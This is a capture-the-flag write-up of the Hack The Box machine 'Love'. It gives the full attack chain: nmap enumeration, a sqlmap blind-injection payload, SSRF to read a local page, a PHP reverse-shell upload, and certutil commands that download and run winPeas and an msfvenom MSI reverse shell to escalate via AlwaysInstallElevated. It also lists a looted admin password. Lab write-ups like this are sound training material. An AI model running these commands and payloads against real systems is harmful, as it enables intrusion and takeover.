![](img/Pasted%20image%2020210501205901.png)

This week box was marked Easy, user flag was owned in 8 minutes and root flag was in 18 minutes. It took me some time longer to figure out, my nmap wasnt even completed by the time user flag fell :D  . 
```Bash
ports=$(nmap -p- --min-rate=1000  -T4 10.10.10.239 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -sC -sV -p$ports 10.10.10.239 -oA alltcp
```
So started off the box with nmap getting a quick scan on al lthe ports then having it go back and do service scans on those found ports. 
```cmd
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Voting System using PHP
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp   open  ssl/http     Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after:  2022-01-18T14:00:16
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
445/tcp   open  microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp  open  mysql?
| fingerprint-strings: 
|   DNSStatusRequestTCP, JavaRMI, LANDesk-RC, LDAPSearchReq, NCP, NotesRPC, SIPOptions, SMBProgNeg, TLSSessionReq, TerminalServerCookie, X11Probe, afp, giop, ms-sql-s: 
|_    Host '10.10.14.185' is not allowed to connect to this MariaDB server
5000/tcp  open  http         Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
5040/tcp  open  unknown
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp  open  ssl/http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=LOVE
| Subject Alternative Name: DNS:LOVE, DNS:Love
| Not valid before: 2021-04-11T14:39:19
|_Not valid after:  2024-04-10T14:39:19
|_ssl-date: 2021-05-01T19:44:03+00:00; +32m20s from scanner time.
| tls-alpn: 
|_  http/1.1
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  msrpc        Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h17m19s, deviation: 3h30m00s, median: 32m19s
| smb-os-discovery: 
|   OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: Love
|   NetBIOS computer name: LOVE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-05-01T12:43:49-07:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-05-01T19:43:50
|_  start_date: N/A


```

From the output we can see the box is
- OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
- Computer name: Love, love.htb
- Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 Server at Port 5000
I checked port 80 and found a login for a Voting webapp

![](img/Pasted%20image%2020210501212122.png)
```
feroxbuster --url http://10.10.10.239 --scan-limit 0 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
```
I tried running feroxbuster top check for directories on port 80 first then port 5000, although port 80 gave alot of 403 and 301 responses.

![](img/Pasted%20image%2020210501211915.png)

I let that run and I started messing around SQLmap to see if there was any SQL injection on the login page. I couldn't find anything usable after dumping the hashes. 

```
---
Parameter: voter (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: voter=admin' AND (SELECT 8024 FROM (SELECT(SLEEP(5)))pdMv) AND 'CrVW'='CrVW&password=admin&login=
---
[15:40:37] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
```

### Subdomains
I then checked for any subdomains, and got a hit: `staging.love.htb` which had a file scanner demo.
```bash
gobuster vhost -v -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt  -u love.htb 
````
![](img/Pasted%20image%2020210501160115.png)
![](img/Pasted%20image%2020210501160304.png)

 I was able to get a connectback on my python webserver , but I couldn't get a shell to execute.
 ![](img/Pasted%20image%2020210501210750.png)

I ended up trying to read files from the local webserver instead and checking the webserver on port 5000 I found a password
`file=http://127.0.0.1:5000/index.php&read=Scan+file`
![](img/Pasted%20image%2020210501165122.png)
![](img/Pasted%20image%2020210501211000.png)

# USER
Wondering where I could use the creds, I tried them in the main site on port 80 but it was looking for numbers, not admin . So going back to my feroxbust result, I checked some of the 301 redirect responses and found that there was indeed another login page at  `/admin` which accepted the credentials.

![](img/Pasted%20image%2020210501165309.png)

I then poked around the interface and found that the under manage>candidates it allowed me to add a new candiate and allowed me to pic an image, which i tried to use a php shell. I used the reverse php shell from [https://github.com/ivan-sincek/php-reverse-shell](https://github.com/ivan-sincek/php-reverse-shell) because it supported Windows. After configuring my IP on the bottom of the script I tried to get it uploaded as my 'Photo'. 

It wouldnt allow me to save because it wanted me to add a 'Position' in the dropdown menu which didn't have any entries in it, I ended up using 'inspect element' by right-clicking the dropdown andin Firefox devtools deleted the node and I was able to save it.  Once saved I immediately had a connect-back on my netcat listener.

![](img/Pasted%20image%2020210501165332.png)
![](img/Pasted%20image%2020210501213227.png)
![](img/Pasted%20image%2020210501213402.png)
![](img/Pasted%20image%2020210501171026.png)


# ROOT

From the netcat session as Phoebe I downloaded winPeas.exe on the box using certutil.
```cmd
certutil.exe -urlcache -f http://10.10.14.185/winPeas.exe winPeas.exe && winPeas.exe
```
After the winPeas scan  finished , I saw some items in red, one of them being the `AlwaysInstallElevated` registry key, You can use the [AlwaysInstallElevated](https://docs.microsoft.com/en-us/windows/win32/msi/alwaysinstallelevated) policy to install a Windows Installer package with elevated (system) privileges. If you were to test for this manually you would just do a reg query:

![](img/Pasted%20image%2020210501195557.png)
![](img/Pasted%20image%2020210501203106.png)

Along with the few [suggested escalation techniques ](https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated) from the winPeas url on how to use this misconfiguration to get to system , I ended up using this [article](https://www.hackingarticles.in/windows-privilege-escalation-alwaysinstallelevated/) and making a msfvenom msi payload.
```
msfvenom -p windows/x64/shell_reverse_tcp lhost=10.10.14.185 lport=9003 -f msi -o install.msi
```
![](img/Pasted%20image%2020210501203732.png)

Then using certutil again to download the .msi and then execute it onto the box.
```cmd
c:\temp>certutil.exe -urlcache -f http://10.10.14.185/install.msi install.msi
c:\temp>msiexec /quiet /qn /i install.msi
```
And caught the reverse shell using netcat.

![](img/Pasted%20image%2020210501205653.png)

# LOOT 
- admin:@LoveIsInTheAir!!!!
- ![](img/Pasted%20image%2020210501172742.png)
